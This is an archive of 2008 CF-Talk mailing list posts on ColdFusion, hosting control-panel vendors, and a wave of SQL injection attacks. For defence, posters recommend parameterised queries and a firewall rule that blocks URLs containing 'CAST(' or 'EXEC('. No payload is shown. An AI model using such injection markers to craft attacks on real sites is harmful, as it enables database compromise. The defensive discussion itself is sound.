RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Cache result sets manually. You can wrap that up nicely in a custom tag. ~Brad -Original Message- From: Kris Jones [mailto:[EMAIL PROTECTED] I am now working with an app that uses cached queries regularly, and is still on CF7. You cannot use cfqueryparam with a cached query in CF7. What are the alternatives? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309416 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Experiences with Railo
Hey, as long as you're being honest and frank about the situation, I know I, for one, appreciate knowing not just that there are products out there, but how they work and are or are not supported. Your experience can save others of us tens of thousands of dollars, as well. Rick -Original Message- From: Jordan Michaels [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 1:03 PM To: CF-Talk Subject: Re: Experiences with Railo Please accept my apologies. I should not have stated this on a public mailing list. It was an emotional response to past experiences that I should have kept under control. Again, my apologies. Warm regards, Jordan Michaels Vivio Technologies http://www.viviotech.net/ Open BlueDragon Steering Committee Adobe Solution Provider Jordan Michaels wrote: H-Shpere was unfortunately bought by the same folks that own Plesk - a company now called Parellels. I would not be surprised if they attempt to move H-Shpere users toward Plesk in the very near future. Parallels was previously SW-Soft - makers of Plesk and Virtuozzo and a whole host of very popular hosting-related software. They went through a buying spree about 6 months ago - buying up their competitors and absorbing their products and their customers. Some of the victims of this process were Comodo's H-sphere, FreeVPS (a Virtuozzo competitor) and CP+ (a Plesk competitor). Further development on FreeVPS and CP+ has been halted, and Parallels has made no attempts to offer a migration path for customers who were using them. This has cost my company tens of thousands of dollars in migration efforts away from CP+ and FreeVPS. It's a crying shame because both FreeVPS and CP+ were *excellent* products, and served us very well for many years. Parallels also publicly stated that they would offer migration paths for customers who were effected by their acquisitions - this never happened. Despite my phone calls and emails asking for said promised service. They never came through. Parallels lies. I do not trust them. I will not use, nor would I recommend their products, or products owned by them, to anyone. Warm regards, Jordan Michaels Vivio Technologies http://www.viviotech.net/ Open BlueDragon Steering Committee Adobe Solution Provider Gerald Guido wrote: Yeah... I forgot about the whole MySQL Debacle with Plesk. That sucked. The one thing I really liked about it was being able to use the API to manage email accounts and user accounts right in our CMS. Anything to not have the phone ring off the hook If you ever need a Hosting CP I would look at H-sphere. I have ran into a few minor speed bumps with it, but over all I have been very happy with it over the years. They have a single server version for *nix.. I think it is free cuz I cant find a price for it. Anyways is only $4.50 per client licence for the full blown version. http://www.psoft.net/promo/single_server.html ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309417 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Seeing Socket Event Gateway break on line breaks with CF8?
Having upgraded to CF8 with no code changes I am seeing a socket event gateway accept an xml message line by line and not the entire xml packet in one shot (each line is shown in the log separately). Passing a simple sentence with a return in it also becomes 2 events. This obviously causes problems, as the xml cannot be recognized and processed when it comes in line by line. The xml is coming from a daemon writen in Perl, and I can't immediately make any changes to it, as these requests are also sent out to other Perl systems, so any changes would have to be tested against them as well. I couldn't find anything online about this being a bug in CF8, has anyone else seen it? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309418 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
I went to look at a site I do side work for and they got hit. No... not my stuff. :) We are going to be reading about this on all the tech rags like Info World and Zdnet tomorrow. ZDnet will prolly post it with a H1 tag with a blink tag for good measure. One of the things about SQL server I never liked was how you could run ore than one sql script at a time. Mysql doesn't allow you to do this LTIL. cfqueryparam... me love you long time. ~G~ If everything seems under control, you're not going fast enough -- Mario Andretti ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309419 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
We are going to be reading about this on all the tech rags like Info World and Zdnet tomorrow. It was in those a week or two ago, already. This is not new. Originally, it primarily targeted classic ASP apps. HP released a free vulnerability scanner called Scrawlr in response. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309420 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Experiences with Railo
Yeah... what Rick said. Psoft put out a great product. H-Sphere is/was a great product. Sorry to hear about that... and your experiences. Your words were kind compared to what I had to say during the Rehat Debacle of 02. ;) ~G~ On Mon, Jul 21, 2008 at 6:29 PM, Rick Faircloth [EMAIL PROTECTED] wrote: Hey, as long as you're being honest and frank about the situation, I know I, for one, appreciate knowing not just that there are products out there, but how they work and are or are not supported. Your experience can save others of us tens of thousands of dollars, as well. Rick ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309421 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Firewall solution is another way, we block anything in the url with CAST( OR EXEC( Thank You Dan On Mon, Jul 21, 2008 at 8:08 PM, Dave Watts [EMAIL PROTECTED] wrote: We are going to be reading about this on all the tech rags like Info World and Zdnet tomorrow. It was in those a week or two ago, already. This is not new. Originally, it primarily targeted classic ASP apps. HP released a free vulnerability scanner called Scrawlr in response. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309422 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
